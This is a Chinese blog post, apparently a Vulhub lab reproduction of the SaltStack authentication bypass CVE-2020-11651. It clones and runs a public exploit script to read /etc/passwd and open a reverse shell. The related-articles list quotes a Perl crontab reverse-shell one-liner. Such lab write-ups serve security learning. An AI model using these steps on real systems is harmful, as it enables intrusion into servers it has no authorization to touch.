SaltStack 水平权限绕过漏洞(CVE-2020-11651)

最新推荐文章于 2023-08-31 21:19:45 发布
最新推荐文章于 2023-08-31 21:19:45 发布
阅读量576 收藏 1
点赞数
分类专栏: 攻防 vulhub 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43589852/article/details/111468422
版权

SaltStack 水平权限绕过漏洞(CVE-2020-11651)

在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。

文章目录

前言

SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。

一、使用步骤

1.进入对应目录

docker-compose会自动查找当前目录下的配置文件(默认文件名为docker-compose.yml),并根据其内容编译镜像和启动容器。所以,要运行某个漏洞靶场,需要先进入该漏洞所在的目录。
在Vulhub中选择某个环境,进入对应目录。

cd vulhub-master/saltstack/CVE-2020-11651

2.启动SaltStack Master

 docker-compose up -d

在这里插入图片描述

环境启动后,将会在本地监听如下端口:

  • 4505/4506 这是SaltStack Master与minions通信的端口
  • 8000 这是Salt的API端口
  • 2222 这是容器内部的SSH服务器监听的端口

docker-compose up -d运行后,会自动查找当前目录下的配置文件。如果配置文件中包含的环境均已经存在,则不会再次编译;如果配置文件中包含的环境不存在,则会自动进行编译。

3.下载poc

git clone https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP.git

在这里插入图片描述

4.安装salt

pip3 install salt

安装pip3(有3就不需要装python3-pip了)

sudo apt-get install python3-pip

刚开始使用的是pip install salt安装的。后来就报错。
走了很多弯路应该下载一个python3-pip
在这里插入图片描述

5.漏洞复现

进入文件夹CVE-2020-11651-CVE-2020-11652-EXP中

cd CVE-2020-11651-CVE-2020-11652-EXP

执行这个CVE-2020-11651.py文件

python3 CVE-2020-11651.py

输入本机上的目标IP
在这里插入图片描述
1.测试poc
在这里插入图片描述
2.读取文件:/etc/passwd
在这里插入图片描述
4.反弹shell
输入要反弹到的IP以及端口
本文反弹到kali的ip
端口:520
监听端口520
在这里插入图片描述
在这里插入图片描述

6.移除docker-compose

Vulhub中所有环境均为漏洞靶场,在测试结束后,请及时关闭并移除环境,避免被他人恶意利用。

虽然靶场全部运行在Docker中,但大多数恶意软件并不会因为运行在容器中就失去效果!

前面说了,docker-compose会默认根据当前目录下的配置文件启动容器,在关闭及移除环境的时候,也需要在对应目录下。我们执行docker-compose up -d后,不要离开当前目录即可,漏洞测试结束后,执行如下命令移除环境:

docker-compose down
小熊的学习笔记
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-11651(SaltStack认证绕过)漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-28 530
SaltStack是使用Python开发的一个服务器基础架构集中化管理平台,底层采用动态的连接总线,使其可以用于编配,远程执行, 配置管理等等。Salt非常容易设置和维护,而不用考虑项目的大小。从数量可观的本地网络系统,到跨数据中心的互联网部署,Salt设计为在任意数量的server下都可工作。Salt的拓扑使用简单的server/client模式,需求的功能内建在一组daemon中。salt在几乎不改动配置的情况下就可以工作,也可以调整从而满足特定的需求。
Python Saltstack框架CVE-2020-11651CVE-2020-11652漏洞以及POC详解
村中少年的专栏
05-10 1562
Python saltstack框架CVE-2020-11651CVE-2020-11652漏洞以及POC详解
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2554
vulhub-spring漏洞复现
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1533
vulhub漏洞复现练习篇
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-11651:CVE-2020-11651
04-15
CVE-2020-11651 在2019.2.4之前的SaltSalt Salt中发现了一个问题,在3000.2。之前的3000中发现了一个问题。 盐主进程ClearFuncs类无法正确验证方法调用。 这使远程用户无需身份验证即可访问某些方法。 这些方法可...
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 422
tomcat漏洞复现
Saltstack CVE-2020-11651CVE-2020-11652复现
dzqxwzoe的博客
01-12 214
SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。在CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞
Vulhub漏洞复现
weixin_45995579的博客
09-30 1702
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
CVE-2020-11651复现
weixin_44576411的博客
12-23 514
CVE-2020-11651(身份验证绕过漏洞) 简述 漏洞原因: SaltStack是python的架构开发工具 但是它的ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,而且还会暴露_prep_auth_info()方法。 漏洞使用方法 攻击者可以通过构造恶意请求,绕过salt master 的验证逻辑,调用相关的未授权功能,从而造成远程命令执行漏洞。 ClearFuncs类处理未经身份验证的请求,并且无意中公开了_send_pub()方法,该方法可用于直接在master服务器上
任意文件读取及漏洞复现
来日可期的博客
08-31 3221
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
漏洞情报 | Windows Install(WMI)越权漏洞CVE-2020-0683)POC在野利用
爱国小白帽
02-02 1090
0x01 漏洞描述 Microsoft Windows是美国微软(Microsoft)公司的个人使用的操作系统(PC)。 2020年初,Windows公布发布的漏洞通告,Windows Install存在越权漏洞CVE-2020-0683),攻击者可以利用该漏洞进行越权修改或者删除系统重要的文件数据。近日,360漏洞云监测到该漏洞的POC已经公开并已出现漏洞在野利用,请相关单位及时更新系统补丁。 0x02 漏洞影响范围 Windows 7 Windows 8.1 Windows RT 8.1 Wind.
SaltStack 任意文件读写漏洞CVE-2020-11652)
EC_Carrot的博客
07-24 325
漏洞复现 我们利用这个POC来进行复现,将文件写入目标crontab里 首先我们需要准备反弹shell的crontab文件,内容如下: */1 * * * * perl -e 'use Socket;$i="your_ip";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,"
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 368
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...
云计算安全漏洞及其对策(一)
DynmicResource的博客
06-17 351
theme: orange 持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第22天,点击查看活动详情 ???? 个人主页:@青Cheng序员石头 上云后,是否不确定如何保护自己免受云计算安全漏洞的影响? 前言 云基础设施可能很复杂,我们都知道复杂性是安全的敌人。尽管大多数云安全专家都认为,公司可以从内置于云中的安全解决方案中获益,但企业也可能犯下严重错误...
nacos权限绕过漏洞(CVE-2021-29441)
最新发布
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名密码等敏感信息。该漏洞的原因是开发者将协商好的user-agent设置为"Nacos-Server",直接硬编码在了代码里,导致了漏洞的出现。攻击者可以通过发送特定的请求,来添加一个新用户,账号密码都为vulhub,然后使用新建的账号进行登录,从而绕过认证。在漏洞利用过程中,只需要用到nacos的web访问端口8848。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值